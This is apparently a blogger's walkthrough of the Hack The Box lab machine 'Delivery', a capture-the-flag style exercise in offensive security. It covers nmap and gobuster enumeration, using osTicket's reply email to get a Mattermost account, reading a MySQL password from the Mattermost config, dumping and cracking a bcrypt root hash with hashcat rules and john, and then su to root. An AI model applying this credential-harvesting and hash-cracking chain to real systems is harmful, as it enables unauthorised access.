And here is another write up at attempting to crack boxes on HTB!
Let’s run an nmap scan.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 09:34 EDT Nmap scan report for 10.10.10.222 Host is up (0.030s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA) | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA) |_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519) 80/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Welcome Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.84 seconds
With only SSH and a web port open, let’s poke at the web service. Meanwhile we can run a full scan, comprising of all TCP ports.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 09:35 EDT Nmap scan report for 10.10.10.222 Host is up (0.060s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA) | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA) |_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519) 80/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Welcome 8065/tcp open unknown | fingerprint-strings: | GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Accept-Ranges: bytes | Cache-Control: no-cache, max-age=31556926, public | Content-Length: 3108 | Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com | Content-Type: text/html; charset=utf-8 | Last-Modified: Sat, 17 Apr 2021 07:56:09 GMT | X-Frame-Options: SAMEORIGIN | X-Request-Id: ybfufx5yptf3fbpwd648s7uxoy | X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false | Date: Sat, 17 Apr 2021 13:46:13 GMT | <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Date: Sat, 17 Apr 2021 13:46:13 GMT |_ Content-Length: 0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8065-TCP:V=7.91%I=7%D=4/17%Time=607AE430%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x SF:20Request")%r(GetRequest,DF3,"HTTP/1\.0\x20200\x20OK\r\nAccept-Ranges:\ SF:x20bytes\r\nCache-Control:\x20no-cache,\x20max-age=31556926,\x20public\ SF:r\nContent-Length:\x203108\r\nContent-Security-Policy:\x20frame-ancesto SF:rs\x20'self';\x20script-src\x20'self'\x20cdn\.rudderlabs\.com\r\nConten SF:t-Type:\x20text/html;\x20charset=utf-8\r\nLast-Modified:\x20Sat,\x2017\ SF:x20Apr\x202021\x2007:56:09\x20GMT\r\nX-Frame-Options:\x20SAMEORIGIN\r\n SF:X-Request-Id:\x20ybfufx5yptf3fbpwd648s7uxoy\r\nX-Version-Id:\x205\.30\. SF:0\.5\.30\.1\.57fb31b889bf81d99d8af8176d4bbaaa\.false\r\nDate:\x20Sat,\x SF:2017\x20Apr\x202021\x2013:46:13\x20GMT\r\n\r\n<!doctype\x20html><html\x SF:20lang=\"en\"><head><meta\x20charset=\"utf-8\"><meta\x20name=\"viewport SF:\"\x20content=\"width=device-width,initial-scale=1,maximum-scale=1,user SF:-scalable=0\"><meta\x20name=\"robots\"\x20content=\"noindex,\x20nofollo SF:w\"><meta\x20name=\"referrer\"\x20content=\"no-referrer\"><title>Matter SF:most</title><meta\x20name=\"mobile-web-app-capable\"\x20content=\"yes\" SF:><meta\x20name=\"application-name\"\x20content=\"Mattermost\"><meta\x20 SF:name=\"format-detection\"\x20content=\"telephone=no\"><link\x20re")%r(H SF:TTPOptions,5B,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nDate:\x2 SF:0Sat,\x2017\x20Apr\x202021\x2013:46:13\x20GMT\r\nContent-Length:\x200\r SF:\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConten SF:t-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n SF:400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r SF:\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close SF:\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x2 SF:0Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nCon SF:nection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain; SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request" SF:); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 117.89 seconds
Attempting to brute-force directories gave nothing, let’s find if the web server virtual host routes.
=============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Domain: delivery.htb [+] Threads: 10 [+] Timeout: 1s [+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt =============================================================== 2021/04/17 09:52:48 Starting gobuster in DNS enumeration mode =============================================================== Found: helpdesk.delivery.htb
We have a website running a ticketing system called osTicket. It’s written in PHP, I guess there’s also a MySQL database running in the host. No interesting exploits on exploitDB yet.
The web service giving an unexpected output on the nmap scan at port 8065 reveals itself to be a software called MatterMost. It’s simply an open-source chatting service with additional nuts and bolts, comparable to Slack. A quick look with searchsploit
reveals no recent exploits, some of the exploits existing are for an older version. We can create an account on this service, however we never receive the email. We consider that either the mail service is not configured, is configured to only send emails to specific email TLD or can simply send to localhost.
With that in mind, we simply create a ticket on osTicket and get assigned a reply email, so customers can directly reply to the email with their ticket ID. It’s a common feature of ticketing system and I use it to get a valid registration on the MatterMost endpoint. After having an account in this service, we obtain credentials for the server as well as a hint nothing that variants of “PleaseSubscribe!” password are reused multiple times across the systems.
We log in to the server and quickly enumerate the system to find credentials in MatterMost configuration.
┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ ssh maildeliverer@delivery.htb The authenticity of host 'delivery.htb (10.10.10.222)' can't be established. ECDSA key fingerprint is SHA256:LKngIDlEjP2k8M7IAUkAoFgY/MbVVbMqvrFA6CUrHoM. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'delivery.htb,10.10.10.222' (ECDSA) to the list of known hosts. maildeliverer@delivery.htb's password: Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Apr 17 10:26:56 2021 from 10.10.14.69 maildeliverer@Delivery:~$ maildeliverer@Delivery:~$ ls -la total 32 drwxr-xr-x 3 maildeliverer maildeliverer 4096 Apr 17 10:31 . drwxr-xr-x 3 root root 4096 Dec 26 09:01 .. lrwxrwxrwx 1 root root 9 Dec 28 07:04 .bash_history -> /dev/null -rw-r--r-- 1 maildeliverer maildeliverer 220 Dec 26 09:01 .bash_logout -rw-r--r-- 1 maildeliverer maildeliverer 3526 Dec 26 09:01 .bashrc drwx------ 4 maildeliverer maildeliverer 4096 Apr 17 10:28 .gnupg -rw------- 1 maildeliverer maildeliverer 70 Apr 17 10:31 .mysql_history -rw-r--r-- 1 maildeliverer maildeliverer 807 Dec 26 09:01 .profile -r-------- 1 maildeliverer maildeliverer 33 Apr 17 10:26 user.txt maildeliverer@Delivery:~$ id uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer) maildeliverer@Delivery:~$ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000 link/ether 00:50:56:b9:e6:8e brd ff:ff:ff:ff:ff:ff inet 10.10.10.222/24 brd 10.10.10.255 scope global ens192 valid_lft forever preferred_lft forever inet6 dead:beef::250:56ff:feb9:e68e/64 scope global dynamic mngtmpaddr valid_lft 85968sec preferred_lft 13968sec inet6 fe80::250:56ff:feb9:e68e/64 scope link valid_lft forever preferred_lft forever [...snip...] maildeliverer@Delivery:~$ cat /opt/mattermost/config | grep "SqlSettings" -A 15 "SqlSettings": { "DriverName": "mysql", "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s", "DataSourceReplicas": [], "DataSourceSearchReplicas": [], "MaxIdleConns": 20, "ConnMaxLifetimeMilliseconds": 3600000, "MaxOpenConns": 300, "Trace": false, "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez", "QueryTimeout": 30, "DisableDatabaseSearch": false },
We have the password for the MySQL user mmuser, I naturally log in and dump the database in the lookout of some juicy information.
mysql -u mmuser -D mattermost -p
We find a database called Users, we dump it to find the password of root account, encrypted:
SELECT * FROM Users; [...snip...] root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
We use the hint given before and create variations of the reused passwords with hashcat
, then proceed to crack it with john
!
┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ vim words.txt ┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ cat words.txt PleaseSubscribe PleaseSubscribe! Please Subscribe ┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ hashcat --force words.txt -r /usr/share/hashcat/rules/best64.rule --stdout > mutated_words.txt ┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ less mutated_words.txt ┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ wc mutated_words.txt 308 308 3574 mutated_words.txt ┌──(kali㉿kali)-[~/Desktop/10.10.10.222] └─$ john creds_mysql_root --wordlist=./mutated_words.txt Using default input encoding: UTF-8 Loaded 1 password hash (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 1024 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status PleaseSubscribe!21 (root) 1g 0:00:00:01 DONE (2021-04-17 12:48) 0.7874g/s 85.03p/s 85.03c/s 85.03C/s PleaseSubscribe!9..PleaseSubscribea Use the "--show" option to display all of the cracked passwords reliably Session completed
Back in the victim machine, cracked credentials gives us root!
maildeliverer@Delivery:~$ su Password: root@Delivery:/home/maildeliverer# root@Delivery:/home/maildeliverer# cd /root root@Delivery:~# ls -la total 44 drwx------ 5 root root 4096 Jan 5 06:39 . drwxr-xr-x 18 root root 4096 Jan 5 06:06 .. lrwxrwxrwx 1 root root 9 Dec 28 07:04 .bash_history -> /dev/null -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc drwxr-xr-x 3 root root 4096 Dec 26 09:33 .cache drwx------ 3 root root 4096 Dec 27 13:41 .gnupg -rwxr-x--- 1 root root 103 Dec 26 11:26 mail.sh -r-------- 1 root root 382 Dec 28 07:02 note.txt -rw-r----- 1 root root 148 Aug 17 2015 .profile -rw-r----- 1 root root 1499 Dec 26 10:55 py-smtp.py -r-------- 1 root root 33 Apr 17 12:40 root.txt drwxr-xr-x 2 root root 4096 Dec 27 14:28 .vim
This was a fairly easy box! Let’s crack more and stay fresh!
Have a good one and thanks for reading!